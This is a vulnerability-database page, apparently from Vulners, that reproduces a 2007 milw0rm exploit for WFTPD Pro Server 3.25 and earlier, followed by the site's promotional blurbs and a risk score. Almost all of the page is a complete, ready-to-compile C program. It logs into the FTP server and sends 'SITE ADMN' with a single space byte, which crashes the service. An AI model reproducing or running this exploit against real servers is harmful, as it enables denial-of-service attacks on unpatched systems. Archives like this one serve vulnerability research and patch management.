Vulners
Lucene search
WFTPD Pro Server <= 3.25 SITE ADMN Remote Denial of Service Exploit
/************************************************************************
*WFTPD server <= 3.25 SITE ADMN DoS *
* *
*Sending command SITE ADMN + \32 makes server BOOM *
* *
*usage: wftpd_dos.exe ip port user pass *
* *
*Coded by Marsu <[email protected]> *
************************************************************************/
#include "winsock2.h"
#include "stdio.h"
#include "stdlib.h"
#pragma comment(lib, "ws2_32.lib")
int main(int argc, char* argv[])
{
struct hostent *he;
struct sockaddr_in sock_addr;
WSADATA wsa;
int ftpsock;
char recvbuff[1024];
char evilbuff[100];
int buflen=100;
if (argc!=5)
{
printf("[+] Usage: %s <ip> <port> <user> <pass>\n",argv[0]);
return 1;
}
WSACleanup();
WSAStartup(MAKEWORD(2,0),&wsa);
printf("[+] Connecting to %s:%s ... ",argv[1],argv[2]);
if ((he=gethostbyname(argv[1])) == NULL) {
printf("Failed\n[-] Could not init gethostbyname\n");
return 1;
}
if ((ftpsock = socket(PF_INET, SOCK_STREAM, 0)) == -1) {
printf("Failed\n[-] Socket error\n");
return 1;
}
sock_addr.sin_family = PF_INET;
sock_addr.sin_port = htons(atoi(argv[2]));
sock_addr.sin_addr = *((struct in_addr *)he->h_addr);
memset(&(sock_addr.sin_zero), '\0', 8);
if (connect(ftpsock, (struct sockaddr *)&sock_addr, sizeof(struct sockaddr)) == -1) {
printf("Failed\n[-] Sorry, cannot connect to %s:%s. Error: %i\n", argv[1],argv[2],WSAGetLastError());
return 1;
}
printf("OK\n");
memset(recvbuff,'\0',1024);
recv(ftpsock, recvbuff, 1024, 0);
memset(evilbuff,'\0',buflen);
memcpy(evilbuff,"USER ",5);
memcpy(evilbuff+5,argv[3],strlen(argv[3]));
memcpy(evilbuff+5+strlen(argv[3]),"\r\n\0",3);
printf("[+] Sending USER ... ");
if (send(ftpsock,evilbuff,strlen(evilbuff),0)==-1) {
printf("Failed\n[-] Could not send\n");
return 1;
}
printf("OK\n");
memset(recvbuff,'\0',1024);
recv(ftpsock, recvbuff, 1024, 0);
memset(evilbuff,'\0',buflen);
memcpy(evilbuff,"PASS ",5);
memcpy(evilbuff+5,argv[4],strlen(argv[4]));
memcpy(evilbuff+5+strlen(argv[4]),"\r\n\0",3);
printf("[+] Sending PASS ... ");
if (send(ftpsock,evilbuff,strlen(evilbuff),0)==-1) {
printf("Failed\n[-] Could not send\n");
return 1;
}
printf("OK\n");
recv(ftpsock, recvbuff, 1024, 0);
memset(evilbuff,'\0',buflen);
memcpy(evilbuff,"SITE ADMN ",10);
memset(evilbuff+10,32,1); //this char is powerfull :p
memcpy(evilbuff+10+1,"\r\n\0",3);
printf("[+] Sending SITE ADMN ... ");
if (send(ftpsock,evilbuff,strlen(evilbuff),0)==-1) {
printf("Failed\n[-] Could not send\n");
return 1;
}
printf("OK\n");
printf("[+] Host should be down\n");
return 0;
}
// milw0rm.com [2007-01-14]
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1